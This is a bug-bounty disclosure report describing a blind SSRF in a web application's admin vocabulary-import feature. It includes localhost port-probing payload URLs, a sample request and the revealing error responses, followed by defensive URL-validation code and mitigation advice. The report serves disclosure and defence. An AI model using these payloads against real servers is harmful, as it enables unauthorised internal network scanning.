huntr report F5018226-0063-415D-9675-D7E30934FF78
Reported by scgajge12 (www.huntr.dev), Jul 16, 2023 - 1:53 a.m.

Server Side Request Forgery (SSRF)

Tags: blind ssrf, vocabulary screen, administrator, import, payload, request, response result

EPSS: 0.0005 (Low), percentile 18.1%

Description

There is a Blind SSRF in the "Import new vocabulary" function on the vocabulary screen of the administrator area: the server fetches the user-supplied "Vocabulary URL" and its error messages reveal whether the destination host and port accepted the connection.

Proof of Concept

Step 1. Log in to the administrator screen and open "Import new vocabulary" from the "vocabulary" page.
Step 2. Enter one of the following payloads in the "Vocabulary URL" field, select JSON-LD as the file format, and confirm from the response that the local environment can be reached.

Payload

Open port: http://localhost:80
Open port: http://localhost:443
Closed port: http://localhost:1234

Request

POST /admin/vocabulary/import HTTP/1.1
 ...

-----------------------------28807843559236410972421406436
Content-Disposition: form-data; name="vocabulary-file[url]"

http://localhost:80
-----------------------------28807843559236410972421406436
Content-Disposition: form-data; name="vocabulary-file[format]"

jsonld
-----------------------------28807843559236410972421406436
 ...

Response Result

Open port:

Unable to load the remote document "<!DOCTYPE html  ...

Closed port:

Unable to connect to localhost:1234 (Connection refused)
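The mitigation for the issue above is to refuse the fetch before it happens: resolve the supplied "Vocabulary URL" and reject any scheme other than http(s) and any address that is loopback, private, link-local or otherwise non-public. The following is an added illustration written for this report, not code from the affected project; the function names, the injectable resolver and the FAKE_DNS table are constructed for the demo.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def system_resolve(host):
    """Return every A/AAAA address for host (used when no resolver is injected)."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0].split("%")[0] for info in infos})

def is_blocked(addr):
    """True for any address the vocabulary importer must never contact."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return (not addr.is_global or addr.is_multicast or addr.is_loopback
            or addr.is_link_local or addr.is_unspecified)

def reject_reason(url, resolve=system_resolve):
    """Return None if url names a public http(s) host, else why it is refused."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return f"scheme not allowed: {parts.scheme!r}"
    if parts.username or parts.password:
        return "credentials in URL are not allowed"
    host = parts.hostname
    if not host:
        return "missing host"
    try:
        addrs = [ipaddress.ip_address(host)]  # literal IP: no DNS lookup needed
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
    if not addrs:
        return f"could not resolve {host!r}"
    blocked = [str(a) for a in addrs if is_blocked(a)]  # every record must pass
    return f"{host!r} resolves to blocked address(es) {blocked}" if blocked else None

# Constructed DNS table so the check runs offline (hypothetical, not real records).
FAKE_DNS = {"localhost": ["127.0.0.1", "::1"], "vocab.example.org": ["93.184.216.34"]}
def fake_resolve(host): return FAKE_DNS.get(host, [])

if __name__ == "__main__":
    for u in ("http://localhost:80", "http://localhost:1234", "http://[::ffff:127.0.0.1]/",
              "ftp://vocab.example.org/v.jsonld", "http://vocab.example.org/v.jsonld"):
        print(u, "->", reject_reason(u, fake_resolve) or "allowed")
```

The check must be repeated on every redirect and the fetch pinned to the validated address, otherwise a hostname that changes between validation and connection bypasses it. Returning one generic import error regardless of the connect outcome also removes the open/closed port difference shown in the response results above.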

PoC Video

https://drive.google.com/file/d/10SmI9dtRewubES4kRHHk2xyupG_GxLF5/view?usp=sharing

